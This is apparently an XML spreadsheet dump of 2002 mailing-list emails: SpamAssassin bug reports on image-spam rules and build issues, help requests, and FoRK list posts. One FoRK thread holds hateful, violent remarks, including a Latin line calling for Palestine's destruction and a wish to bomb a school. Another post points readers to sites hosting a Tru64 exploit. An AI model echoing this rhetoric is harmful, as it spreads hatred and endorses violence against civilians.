    <t>[URL]http://www.hughes-family.org[/URL]\n\n           Summary: IMG tag based rules\n           Product: Spamassassin\n           Version: unspecified\n          Platform: Other\n        OS/Version: other\n            Status: NEW\n          Severity: enhancement\n          Priority: P2\n         Component: Eval Tests\n        AssignedTo: spamassassin-devel@example.sourceforge.net\n        ReportedBy: matt@nightrealms.com\n\n\nInspired by complaints about all-image or mostly-image spam that's\ngetting by SA, I've cooked up three sets of rules that analyze the use\nof IMG tags in HTML: one that looks at the total area of all of the\nimages in the message (T_HTML_IMAGE_AREA*), one that looks at the\ntotal number of images in the message (T_HTML_NUM_IMGS*), and one that\nlooks at the longest total run of consecutive images\n(T_HTML_CONSEC_IMG*).\n\n===============\n\nThe total area of all images is rather easy to compute: inside of\nHTML::html_tests(), if an IMG tag has both the width and height\nproperties, then multiply them together and add the result to the\nrunning total.\n\nOVERALL%   SPAM% NONSPAM%     S/O    RANK   SCORE  NAME\n  15113     4797    10316    0.32    0.00    0.00  (all messages)\n100.000   31.741   68.259    0.32    0.00    0.00  (all messages as %)\n  0.635    2.001    0.000    1.00    0.81    0.01  T_HTML_IMAGE_AREA14\n  0.417    1.313    0.000    1.00    0.78    0.01  T_HTML_IMAGE_AREA15\n  0.331    1.042    0.000    1.00    0.76    0.01  T_HTML_IMAGE_AREA07\n  0.245    0.771    0.000    1.00    0.74    0.01  T_HTML_IMAGE_AREA10\n  0.238    0.750    0.000    1.00    0.74    0.01  T_HTML_IMAGE_AREA02\n  0.225    0.709    0.000    1.00    0.74    0.01  T_HTML_IMAGE_AREA16\n  0.126    0.396    0.000    1.00    0.70    0.01  T_HTML_IMAGE_AREA18\n  0.119    0.375    0.000    1.00    0.70    0.01  T_HTML_IMAGE_AREA19\n  0.119    0.375    0.000    1.00    0.70    0.01  T_HTML_IMAGE_AREA17\n  1.125    3.523    0.010    1.00    0.68    0.01  T_HTML_IMAGE_AREA12\n  0.741    2.314    0.010    1.00    0.65    0.01  T_HTML_IMAGE_AREA13\n  1.542    4.732    0.058    0.99    0.58    0.01  T_HTML_IMAGE_AREA11\n  0.139    0.417    0.010    0.98    0.54    0.01  T_HTML_IMAGE_AREA08\n  0.483    1.397    0.058    0.96    0.50    0.01  T_HTML_IMAGE_AREA03\n  0.192    0.500    0.048    0.91    0.44    0.01  T_HTML_IMAGE_AREA06\n  0.820    1.834    0.349    0.84    0.39    0.01  T_HTML_IMAGE_AREA04\n  0.946    2.022    0.446    0.82    0.38    0.01  T_HTML_IMAGE_AREA01\n  0.569    0.896    0.417    0.68    0.32    0.01  T_HTML_IMAGE_AREA05\n  6.498    0.500    9.287    0.05    0.02    0.01  T_HTML_IMAGE_AREA09\n\nSpam % of all rules with S/0 &gt; 0.90: 20.615%\n\n=============================\n\nThe total number of IMG tags is really easy to do.\n\n  0.648    2.043    0.000    1.00    0.81    0.01  T_HTML_NUM_IMGS08\n  0.609    1.918    0.000    1.00    0.80    0.01  T_HTML_NUM_IMGS09\n  0.490    1.543    0.000    1.00    0.79    0.01  T_HTML_NUM_IMGS10\n  0.119    0.375    0.000    1.00    0.70    0.01  T_HTML_NUM_IMGS14\n  0.986    3.064    0.019    0.99    0.63    0.01  T_HTML_NUM_IMGS06\n  2.303    7.150    0.048    0.99    0.62    0.01  T_HTML_NUM_IMGS11\n  0.033    0.104    0.000    1.00    0.61    0.01  T_HTML_NUM_IMGS17\n  0.787    2.439    0.019    0.99    0.61    0.01  T_HTML_NUM_IMGS12\n  0.344    1.063    0.010    0.99    0.60    0.01  T_HTML_NUM_IMGS13\n  0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_NUM_IMGS20\n  0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_NUM_IMGS16\n  0.860    2.627    0.039    0.99    0.57    0.01  T_HTML_NUM_IMGS05\n  0.754    2.293    0.039    0.98    0.56    0.01  T_HTML_NUM_IMGS07\n  0.013    0.042    0.000    1.00    0.55    0.01  T_HTML_NUM_IMGS18\n  0.887    2.627    0.078    0.97    0.52    0.01  T_HTML_NUM_IMGS04\n  1.356    3.711    0.262    0.93    0.47    0.01  T_HTML_NUM_IMGS03\n  0.046    0.125    0.010    0.93    0.46    0.01  T_HTML_NUM_IMGS15\n  6.061   10.256    4.110    0.71    0.34    0.01  T_HTML_NUM_IMGS01\n  0.040    0.063    0.029    0.68    0.32    0.01  T_HTML_NUM_IMGS19\n  6.233    4.753    6.921    0.41    0.22    0.01  T_HTML_NUM_IMGS02\n\nSpam % of all rules with S/O &gt; 0.90: 31.25%\n\n=========================\n\nI figured that spam that is made up of only images is going to only\nhave IMG tags interspersed with table, paragraph and linebreak tags,\nand some whitespace, so there would be a lot of IMG tags with no plain\ntext (non-whitespace) between them.  So I defined consecutive IMG tags\nto be ones with no text between them, and looked at the longest run of\nconsecutive IMGs within a message.\n\nThis one seems to do pretty good, because in my non-spam corpus\nthere's only a handful of messages with IMG runs larger than two.\n\n  0.450    1.418    0.000    1.00    0.78    0.01  T_HTML_CONSEC_IMGS06\n  0.232    0.730    0.000    1.00    0.74    0.01  T_HTML_CONSEC_IMGS08\n  0.205    0.646    0.000    1.00    0.73    0.01  T_HTML_CONSEC_IMGS11\n  1.813    5.691    0.010    1.00    0.71    0.01  T_HTML_CONSEC_IMGS02\n  1.019    3.189    0.010    1.00    0.67    0.01  T_HTML_CONSEC_IMGS03\n  0.768    2.397    0.010    1.00    0.66    0.01  T_HTML_CONSEC_IMGS05\n  0.053    0.167    0.000    1.00    0.64    0.01  T_HTML_CONSEC_IMGS12\n  1.006    3.127    0.019    0.99    0.63    0.01  T_HTML_CONSEC_IMGS04\n  0.483    1.501    0.010    0.99    0.62    0.01  T_HTML_CONSEC_IMGS07\n  0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_CONSEC_IMGS13\n  0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_CONSEC_IMGS15\n  1.032    3.148    0.048    0.98    0.57    0.01  T_HTML_CONSEC_IMGS10\n  0.199    0.605    0.010    0.98    0.57    0.01  T_HTML_CONSEC_IMGS09\n  0.013    0.042    0.000    1.00    0.55    0.01  T_HTML_CONSEC_IMGS17\n  0.013    0.042    0.000    1.00    0.55    0.01  T_HTML_CONSEC_IMGS19\n  0.007    0.021    0.000    1.00    0.51    0.01  T_HTML_CONSEC_IMGS14\n  7.080    7.484    6.892    0.52    0.26    0.01  T_HTML_CONSEC_IMGS01\n  0.000    0.000    0.000    0.00    0.00    0.01  T_HTML_CONSEC_IMGS16\n  0.000    0.000    0.000    0.00    0.00    0.01  T_HTML_CONSEC_IMGS18\n\nSpam % of all rules with S/O &gt; 0.90: 22.85%\n\n==========================\n\nNext I'm going to see if there's any meta rules I can make that will\nreduce the FP rate for low S/O rules.\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18:51:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 18:51:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 1052] bondedsender.com is a scam</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\n\n\n\n\n------- Additional Comments From rOD-spamassassin@arsecandle.org  2002-10-03 18:51 -------\nIgnoring the conspiracy theories, can you supply examples of spam which was \nscored with RCVD_IN_BONDEDSENDER?  The only mail I have received which scored \nthis were from Amazon.com.\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16:17:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 16:17:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 1052] New: bondedsender.com is a scam</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\n           Summary: bondedsender.com is a scam\n           Product: Spamassassin\n           Version: unspecified\n          Platform: Other\n               URL: [URL]http://www.bondedsender.com[/URL]\n        OS/Version: other\n            Status: NEW\n          Severity: normal\n          Priority: P2\n         Component: Rules\n        AssignedTo: spamassassin-devel@example.sourceforge.net\n        ReportedBy: friedman+spamassassin@splode.com\n\n\nThe default score for bondedsender-certified domains is -10, but I do not\nbelieve they should be trusted and encourage you to change the default.\n\n* I have been spammed by their customers.\n* There is no documentation on their website about how I can complain about\n  this and have their customers financially penalized for sending me unsolicited\n  mail.\n* What proof do any of us have that they really even do anything about it?\n  Their contract is with their customers, not with us.\n\nThis is a scam!  Don't trust them!\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http://www.hughes-family.org http://www.bondedsender.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: bugzilla-daemon@hughes-family.org\nDate: Thu,  3 Oct 2002 14:21:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 14:21:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 779] rule broken: CORRUPT_MSGID</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\nspamassassin-contrib@msquadrat.de changed:\n\n           What    |Removed                     |Added\n----------------------------------------------------------------------------\n             Status|NEW                         |RESOLVED\n         Resolution|                            |FIXED\n\n\n\n------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 14:21 -------\nI think INVALID_MSGID does what this rule was supposed to do \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14:17:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 14:17:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 739] rules broken: RATWARE_*</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\nspamassassin-contrib@msquadrat.de changed:\n\n           What    |Removed                     |Added\n----------------------------------------------------------------------------\n             Status|NEW                         |RESOLVED\n         Resolution|                            |WONTFIX\n\n\n\n------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 14:17 -------\nRelieving Dan ;-) \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14:16:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 14:16:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 960] COMMENT low-performing rule pruned</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\nspamassassin-contrib@msquadrat.de changed:\n\n           What    |Removed                     |Added\n----------------------------------------------------------------------------\n             Status|NEW                         |RESOLVED\n         Resolution|                            |WONTFIX\n\n\n\n------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 14:16 -------\nI think it's ok to close this one? Comment is a valid, albeit seldom used RFC \n2822 header... \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13:57:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 13:57:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 1006] Spamassassin's build process makes packaging</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\n\n\n\n\n------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 13:57 -------\nA solution could be the preprocessor in combination with PM_FILTER -- if we \nget the ExtUtils::MakeMaker versioning stuff right (see bug 1046). \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13:57:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 13:57:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 1046] Errors from 'perl Makefile.PL'</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\n\n\n\n\n------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 13:57 -------\n&gt; I've thought about this and PM_FILTER needs to die. I've now tried  \n&gt; multiple ways to make it just transparently work on 5.00503 and failed.  \n&gt; If anyone has any bright ideas please jump in. \n&gt;  \n&gt; You see anyone upgrading from the CPAN shell will get a failure on the line: \n&gt;  \n&gt;    use ExtUtils::MakeMaker 5.45; \n \nQuite some modules from CPAN do have a line like this nowadays (I think or \nread so somewhere, respectively). And the Perl error message is very clear: \n"ExtUtils::MakeMaker version 5.45 required--this is only version 5.4302 at \nMakefile.PL line 2." \n \n&gt; Because it never gets chance to reach a "WriteMakefile" line with a  \n&gt; PREREQ_PM =&gt; { ExtUtils::MakeMaker =&gt; 5.45 } option. So the CPAN shell  \n&gt; can't automatically upgrade this module. I cannot think of any way  \n&gt; around this. \n \nI could think of a solution: We could remove the "use" line and add the \nversion to PREREQ_PM. After WriteMakefile() we could add the lines \n  require ExtUtils::MakeMaker; \n  ExtUtils::MakeMaker-&gt;VERSION(5.45); \nto do per hand what 'use ExtUtils::MakeMaker 5.45' does automagically; `perl \nMakefile.PL` will die with a "Uncaught exception from user code: \nExtUtils::MakeMaker version 5.45 required--this is only version 5.4302 at \nMakefile.PL line 103." there but we've got a Makefile. But I don't know if \nCPAN will run the make anyway... \n \n&gt; To add insult to injury, the PM_FILTER part gets run during pm_to_blib,  \n&gt; which would be fine, except ExtUtils::MakeMaker doesn't let you write a  \n&gt; MY::pm_to_blib - it's non-overridable! So even though we could  \n&gt; potentially copy the 5.45 ExtUtils::Install::pm_to_blib code somewhere  \n&gt; into the spamassassin codebase (I tried that first), we can't cause the  \n&gt; Makefile to call our code :-( \n \nWe could call the preprocessor on install time. That's not a very clean \napproach but could work. \n \nWe can also overwrite pm_to_blib in the Makefile directly per postamble. We \nalready have a useless line "pm_to_blib: spamassassin doc/.made" there. Adding \nsome commands in this section gives some make warnings ("Makefile:933: \nwarning: overriding commands for target `pm_to_blib' Makefile:877: warning: \nignoring old commands for target `pm_to_blib'") but does work. Not a very good \nsolution either. \n \n&gt; So I'm *strongly* against the current use of ExtUtils::MakeMaker 5.45  \n&gt; usage (if this were an Apache project this would be my veto vote), and  \n&gt; really hope we can find another way. \n \nThe "use MakeMaker::..." error message is IMHO quite clear, so I think it's ok \nto require the user to do a manual update of ExtUtils::MakeMaker before the SA \ninstallation. But that's just my opinion ;-) \n \nI'll ask on makemaker@perl.org for the best solution. They should know. \n\n\n\n------- You are receiving this mail because: -------\nYou are on the CC list for the bug, or are watching someone who is.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: bugzilla-daemon@hughes-family.org\nDate: Thu,  3 Oct 2002 13:29:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 13:29:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL] jm@jmason.org changed:            What    |Removed                     |Added ----------------------------------------------------------------------------              Status|NEW                         |ASSIGNED ------- Additional Comments From jm@jmason.org  2002-10-03 13:29 ------- 1. Use of $Config is gradually being removed, thankfully.  I don't want to see any of that stuff in there if it acn be avoided, as different perl versions jsut vary so much in that stuff. 2. perl has no concept of where the rules could be -- unless they're in the perl libdir (/usr/lib/perl5/site_perl/5.x.x/foo).  Perl does not know about the existence of /usr/share or /etc.  Used to use /usr/lib/perl5 for storing rules, and it was actually *much worse* than it is now. So we need an out-of-band way to tell SA where to find this stuff. that's the problem! 3. try "perl Makefile.PL &lt; /dev/null" to allow bots to build it. I think I might be missing some details of what you're peeved about, though... could you elaborate specifically? ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-devel mailing list Spamassassin-devel@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: bugzilla-daemon@hughes-family.org\nDate: Thu,  3 Oct 2002 13:26:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu,  3 Oct 2002 13:26:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 1049] Pathname for "triplets.txt" is incorrect.</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\nfelicity@kluge.net changed:\n\n           What    |Removed                     |Added\n----------------------------------------------------------------------------\n             Status|NEW                         |RESOLVED\n         Resolution|                            |FIXED\n\n\n\n------- Additional Comments From felicity@kluge.net  2002-10-03 13:26 -------\nHmmm, my last message doesn't seem to have made it into bugzilla yet.\n\nI've committed a patch to fix this problem in both HEAD and b2_4_0.  The last\nmessage explains what the problem was and what the patch does to fix it.\n\n\n\n------- You are receiving this mail because: -------\nYou are the assignee for the bug, or are watching the assignee.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Thu,  1 Aug 2002 17:44:35 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu,  1 Aug 2002 17:44:35 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: Scramjet works? : HyShot experiment takes-off</t>
  </si>
  <si>
    <t>Quoth R. A. Hettinga:\n&gt;The HyShot experiment - attempting the world`s first flight test of the\n&gt;supersonic combustion process - was launched at 1135 local time (1205 AEST)\n&gt;at the Woomera Prohibited Area, 500km north of Adelaide today.\n\nEh?  AFAIK, the Russian Kholod program achieved successful supersonic\ncombustion in a scramjet about 10 years ago.\n\nBye,\n  Rob.\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Thu,  1 Aug 2002 00:50:10 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu,  1 Aug 2002 00:50:10 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: vkatalov@elcomsoft.com: Security warning draws DMCA threat</t>
  </si>
  <si>
    <t>Jon O. wrote:\n&gt; Looks like HP is using the DMCA to prevent full disclosure of\n&gt; security vulnerablities. This is not a good precedent...\n&gt; [...]\n&gt; &gt; WASHINGTON--Hewlett Packard has found a new club to use to pound\n&gt; &gt; researchers who unearth flaws in the company's software: the Digital\n&gt; &gt; Millennium Copyright Act.\n&gt; &gt;\n&gt; &gt; Invoking both the controversial 1998 DMCA and computer crime laws, HP\n&gt; &gt; has threatened to sue a team of researchers who publicized a\n&gt; &gt; vulnerability in the company's Tru64 Unix operating system.\n&gt; &gt; [...]\n\nWell that exploit requires an executable stack so it won't happen on a\nproperly admin-ed system.  But anyway grab it if you want from any of\na million places, such as:\n\n  [URL]http://www.securiteam.com[/URL]\n\n  [URL]http://packetstormsecurity.nl[/URL]\n\n  [URL]http://spisa.act.uji.es[/URL]\n\n\nBye,\n  Rob.\n     .-.                                                               .-.\n    /   \           .-.                                 .-.           /   \\n   /     \         /   \       .-.     _     .-.       /   \         /     \\n  /       \       /     \     /   \   / \   /   \     /     \       /       \\n /         \     /       \   /     `-'   `-'     \   /       \     /         \\n            \   /         `-'                     `-'         \   /\n             `-'                                               `-'\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.securiteam.com http://packetstormsecurity.nl http://spisa.act.uji.es http://xent.com</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Robin Lynn Frank &lt;rlfrank@paradigm-omega.com&gt;\nDate: Sun, 8 Sep 2002 16:33:10 -0700</t>
  </si>
  <si>
    <t>Sun, 8 Sep 2002 16:33:10 -0700</t>
  </si>
  <si>
    <t>[SAtalk] Huh?</t>
  </si>
  <si>
    <t>Despite my lack of confidence to upgrade to 2.41 using the tarball instead of  cpan, it worked.  With the help of others, got razor working.  I did however  notice something in my logs which happened twice but hasn't recurred. Sep  8 16:10:11 omega spamd[14014]: razor2 check skipped: Permission denied  Can't call method "log" on unblessed reference at  /usr/lib/perl5/site_perl/5.6.1/Razor2/Client/Agent.pm line 211,  line  66. --  Robin Lynn Frank Paradigm-Omega, LLC ================================== The only certainty about documentation is that whoever wrote it "might" have understood it. The rest of us may not be so lucky. ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;\nDate: Sun, 8 Sep 2002 16:19:34 +0200</t>
  </si>
  <si>
    <t>Sun, 8 Sep 2002 16:19:34 +0200</t>
  </si>
  <si>
    <t>Re: [SAtalk] Lotus Notes users?</t>
  </si>
  <si>
    <t>On Saturday 07 September 2002 23:22 CET Daniel Quinlan wrote: &gt; Craig Hughes  writes: &gt; &gt; How about configuring SA to set precendence to "low" for spam &gt; &gt; messages, then filter on that -- no real human I've ever seen has &gt; &gt; actually set precendence to low on real mail. &gt; &gt; Assuming there isn't a better way for Lotus Notes users, we could &gt; create a "Precedence: spam" convention.  The only two Precedence: &gt; headers I've seen (aside from one or two odd messages) are "bulk" and &gt; "list".  Adding a "spam" header makes sense given the convention. I'd suggest using Precedence: junk. Albeit it's no standard header does most  Software already recognize it. Courier eg. doesn't send auto-replies to  mails with the Precedence bulk or junk. I think Outlook does handle these  special, too. [1] says: | Autoresponses should always contain the header |          Precedence: junk | Notice the spelling of "prec-e-dence". In particular, count the number of | n:s (and a:s and s:es, if you're totally agraphic and/or from the United | States). This will prevent well-tempered mail programs from generating | bounce messages for these. If the recipient can't be reached, the | autoresponder message is simply discarded.  | [...] | (For what it's worth, the meaning of the Precedence header in practice is | that it affects Sendmail so that messages identified as less important get | moved back in the queue under high load. [...]) &gt;[...] Malte [1] Moronic Mail Autoresponders (A FAQ From Hell): [URL]http://www.ling.helsinki.fi[/URL] --  --- Coding is art. --  ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.ling.helsinki.fi https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Robin Lynn Frank &lt;rlfrank@paradigm-omega.com&gt;\nDate: Sun, 8 Sep 2002 06:59:04 -0700</t>
  </si>
  <si>
    <t>Sun, 8 Sep 2002 06:59:04 -0700</t>
  </si>
  <si>
    <t>[SAtalk] spamd can't find...</t>
  </si>
  <si>
    <t>I thought I'd installed razor correctly, but I am seeing the following in my  logs.  Can anyone give me a hitn? Sep  8 06:46:45 omega spamd[6514]: razor2 check skipped: No such file or  directory Can't locate object method "new" via package "Net::DNS::Resolver"  (perhaps you forgot to load "Net::DNS::Resolver"?) at (eval 31) line 1,   line 114. ^I...propagated at  /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/Dns.pm line 392,   line 114. --  Robin Lynn Frank Paradigm-Omega, LLC ================================== The only certainty about documentation is that whoever wrote it "might" have understood it. The rest of us may not be so lucky. ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Sun, 6 Oct 2002 12:36:28 +0200</t>
  </si>
  <si>
    <t>Sun, 6 Oct 2002 12:36:28 +0200</t>
  </si>
  <si>
    <t>Re: xine src package</t>
  </si>
  <si>
    <t>Once upon a time, Roi wrote : &gt; Same as in mplayer src package &gt; the --with and --without not working correctly &gt; I do --without arts and it still want to install with arts This time the problem seems to be that I overestimated xine-lib's configure script as it seems that it doesn't support disabling arts... so if you have arts-devel installed, its support will be compiled in :-/ Also, I had made another mistake and added the configure option to disable lirc ot xine-lib when it should have been for xine-ui. All this is fixed in the upcoming "fr6" release. Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10 Load : 0.08 0.15 0.11, AC on-line, battery charging: 100% (1:47) _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;johnhall@evergo.net&gt;, "FoRK" &lt;fork@spamassassin.taint.org&gt;\nFrom: "Geege Schuman" &lt;geege@barrera.org&gt;\nDate: Sun, 6 Oct 2002 00:34:38 -0400</t>
  </si>
  <si>
    <t>Sun, 6 Oct 2002 00:34:38 -0400</t>
  </si>
  <si>
    <t>&lt;johnhall@evergo.net&gt;, "FoRK" &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RE: Our friends the Palestinians, Our servants in government.</t>
  </si>
  <si>
    <t>she read the links. what must it be like, she wondered, to devote ones life\nto pointing out  neighbors' mistakes, mishaps, inconsistencies and\nfrailties?\n\ngloating is definitely underrated in the good book - eh, john?\n\nbring it on,\ngg\n\n-----Original Message-----\nFrom: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John\nHall\nSent: Saturday, October 05, 2002 11:56 PM\nTo: FoRK\nSubject: Our friends the Palestinians, Our servants in government.\n\n\n\n\nHijacker High (8/30)\nDalal Mughrabi was a Palestinian woman who participated in a 1978 bus\nhijacking in which 36 Israelis and an American nature photographer, Gail\nRuban, were killed. Mughrabi has a Palestinian high school named after\nher, and it's apparently starting to show signs of wear. Fortunately,\nthe United States Agency for International Development has stepped in\nwith money to help renovate it.\n\n[URL]http://reason.com[/URL]\n\nLinks to:\n\n[URL]http://www.cnsnews.com[/URL]\ForeignBureaus\archi\nve\200208\FOR20020807e.html\n\nPraeterea censeo Palestininem esse delendam.</t>
  </si>
  <si>
    <t>http://reason.com http://www.cnsnews.com</t>
  </si>
  <si>
    <t>To: "'FoRK'" &lt;fork@spamassassin.taint.org&gt;\nFrom: Ian Andrew Bell &lt;fork@ianbell.com&gt;\nDate: Sun, 6 Oct 2002 00:25:36 -0700</t>
  </si>
  <si>
    <t>Sun, 6 Oct 2002 00:25:36 -0700</t>
  </si>
  <si>
    <t>"'FoRK'" &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Re: Our friends the Palestinians, Our servants in government.</t>
  </si>
  <si>
    <t>I propose they rename it "Charlie Heston High" and maybe the students  \nwill learn to take AR-15s with extended military-spec scopes and .223  \nhigh-velocity ammo and start plinking innocent civilians at random in  \nthe suburbs of Washington.  That's far more effectual than blowing  \noneself up in a bus.\n\nIn America these days, it seems that violence ascribed to any political  \ndoctrine foreign to Bushism is vile and repugnant.  But random violence  \nis entertainment and intrigue.\n\nA couple of ex-FBI "consultants" speaking on the shootings in DC were  \nquoted as saying the shooters, presumed to be a pair, were getting a  \n"heroin-like high" from each successful kill and that they "for  \nwhatever reason decided to level the playing field, thumbing their nose  \nat law enforcement and society."\n\nSee?  Just a couple of kids having fun with Daddy's semi-automatic  \nhunting rifle.  Harmless!\n\n-Ian.	\n\nOn Saturday, October 5, 2002, at 11:01 PM, John Hall wrote:\n\n&gt;\n&gt; It wasn't gloating, it was one for the horror file.\n&gt;\n&gt; And of course for the Palestinians it wasn't a mistake, which is a key\n&gt; part of the horror.\n&gt;\n&gt; I'm not against American taxpayers remodeling a school honoring a  \n&gt; killer\n&gt; if we do it with a daisy cutter.\n&gt;\n&gt;\n&gt;\n&gt;&gt; -----Original Message-----\n&gt;&gt; From: Geege Schuman [mailto:geege@barrera.org]\n&gt;&gt; Sent: Saturday, October 05, 2002 9:35 PM\n&gt;&gt; To: johnhall@evergo.net; FoRK\n&gt;&gt; Subject: RE: Our friends the Palestinians, Our servants in government.\n&gt;&gt;\n&gt;&gt; she read the links. what must it be like, she wondered, to devote ones\n&gt;&gt; life\n&gt;&gt; to pointing out  neighbors' mistakes, mishaps, inconsistencies and\n&gt;&gt; frailties?\n&gt;&gt;\n&gt;&gt; gloating is definitely underrated in the good book - eh, john?\n&gt;&gt;\n&gt;&gt; bring it on,\n&gt;&gt; gg\n&gt;&gt;\n&gt;&gt; -----Original Message-----\n&gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of\n&gt; John\n&gt;&gt; Hall\n&gt;&gt; Sent: Saturday, October 05, 2002 11:56 PM\n&gt;&gt; To: FoRK\n&gt;&gt; Subject: Our friends the Palestinians, Our servants in government.\n&gt;&gt;\n&gt;&gt;\n&gt;&gt;\n&gt;&gt;\n&gt;&gt; Hijacker High (8/30)\n&gt;&gt; Dalal Mughrabi was a Palestinian woman who participated in a 1978 bus\n&gt;&gt; hijacking in which 36 Israelis and an American nature photographer,\n&gt; Gail\n&gt;&gt; Ruban, were killed. Mughrabi has a Palestinian high school named after\n&gt;&gt; her, and it's apparently starting to show signs of wear. Fortunately,\n&gt;&gt; the United States Agency for International Development has stepped in\n&gt;&gt; with money to help renovate it.\n&gt;&gt;\n&gt;&gt; [URL]http://reason.com[/URL]\n&gt;&gt;\n&gt;&gt; Links to:\n&gt;&gt;\n&gt;&gt;\n&gt; [URL]http://www.cnsnews.com[/URL] \n&gt; ViewForeignBureaus.asp?Page=\ForeignBureaus\archi\n&gt;&gt; ve\200208\FOR20020807e.html\n&gt;&gt;\n&gt;&gt; Praeterea censeo Palestininem esse delendam.\n&gt;&gt;\n&gt;&gt;\n&gt;&gt;\n&gt;&gt;\n&gt;&gt;\n&gt;</t>
  </si>
  <si>
